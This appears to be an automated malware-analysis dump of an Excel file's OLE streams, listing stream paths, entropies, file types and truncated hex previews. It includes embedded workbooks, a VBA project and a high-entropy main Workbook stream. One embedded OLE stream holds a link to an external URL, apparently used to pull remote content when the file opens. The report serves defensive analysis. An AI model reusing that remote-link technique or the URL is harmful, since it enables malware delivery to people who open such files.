        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
        General
        Stream Path:MBD0191BFB6/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB6/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:12479
        Entropy:7.0945112382968425
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB7/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB7/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:37036
        Entropy:7.720975169587741
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:244
        Entropy:2.701136490257069
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
        General
        Stream Path:MBD0191BFB8/\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:220
        Entropy:3.372234242231489
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:MBD0191BFB8/MBD0018D4CE/\x1Ole
        CLSID:
        File Type:data
        Stream Size:20
        Entropy:0.5689955935892812
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . .
        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD0018D4CE/\x3ObjInfo
        CLSID:
        File Type:data
        Stream Size:4
        Entropy:0.8112781244591328
        Base64 Encoded:False
        Data ASCII:. . . .
        Data Raw:00 00 03 00
        General
        Stream Path:MBD0191BFB8/MBD0018D4CE/Contents
        CLSID:
        File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
        Stream Size:197671
        Entropy:6.989042939766534
        Base64 Encoded:True
        Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD0068D442/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.219515110876372
        Base64 Encoded:False
        Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD0068D442/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:26243
        Entropy:7.635433729726103
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD007203CB/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD007203CB/\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:248
        Entropy:3.0523231150355867
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:MBD0191BFB8/MBD007203CB/\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:256
        Entropy:4.086306928392587
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:MBD0191BFB8/MBD007203CB/Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:134792
        Entropy:7.974168320310173
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:468
        Entropy:5.269289820125323
        Base64 Encoded:True
        Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
        Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
        CLSID:
        File Type:data
        Stream Size:83
        Entropy:3.0672749060249043
        Base64 Encoded:False
        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2486
        Entropy:3.9244127831265385
        Base64 Encoded:False
        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
        General
        Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
        CLSID:
        File Type:data
        Stream Size:536
        Entropy:6.330646364694152
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
        Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
        General
        Stream Path:MBD0191BFB8/MBD00726B69/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.219515110876372
        Base64 Encoded:False
        Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/MBD00726B69/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:26242
        Entropy:7.635424485665502
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB8/Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:283872
        Entropy:7.743278150467805
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
        General
        Stream Path:MBD0191BFB9/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFB9/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:45934
        Entropy:7.5587990853484195
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0191BFBA/\x1Ole
        CLSID:
        File Type:data
        Stream Size:744
        Entropy:5.677200951472466
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . ` . . . y . . . K . \\ . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . f . 0 . O . 8 . J . N . 5 . 2 . 9 . 8 . ? . & . l . e . t . t . e . r . = . m . u . d . d . y . & . g . o . b . b . l . e . r . = . t . i . r . e . s . o . m . e . & . n . e . x . u . s . . . . ( Y ? . p . . { & 4 . v . . . T ` . . . n N z ) . J ^ . . e \\ . a " . g . w b r . . + | t . : . . R ? B . $ L ; : q 2 > 3 v k X . x # D D % 6 r . x L . f 1 H H ~ c O . % . X
        Data Raw:01 00 00 02 bd bc c0 06 96 8f b5 7f 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 5c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 66 00 30 00 4f 00 38 00 4a 00 4e 00 35 00 32 00 39 00 38 00 3f 00 26 00 6c 00 65 00 74 00 74 00 65 00 72 00 3d 00 6d 00
        General
        Stream Path:Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:320222
        Entropy:7.998542413720984
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . J . . s . h . 1 . @ . . P . M V k . . . F . . . . . . . t . . . \\ . p . . \\ . . V @ ' P . , B . Q . . Y . e . . & . W X , Y ! . s . / y A . . 7 . X % w l = [ ! . . { . . R ; , . . . w P % B . . . D . a . . . W . . . = . . . ; 1 Y . . . . . . 6 ; ^ n K = . . . . . . . . / . . . . . ; . . . . . . . 6 . . . . = . . . _ I l ] . + 2 b . @ . . . . . . . . . " . . . R . . . . k A . . . - . . . . 1 . . . . . l . ^ . N g 9 . 9 k s . 1 T 1 . . . . 6 . . . b .
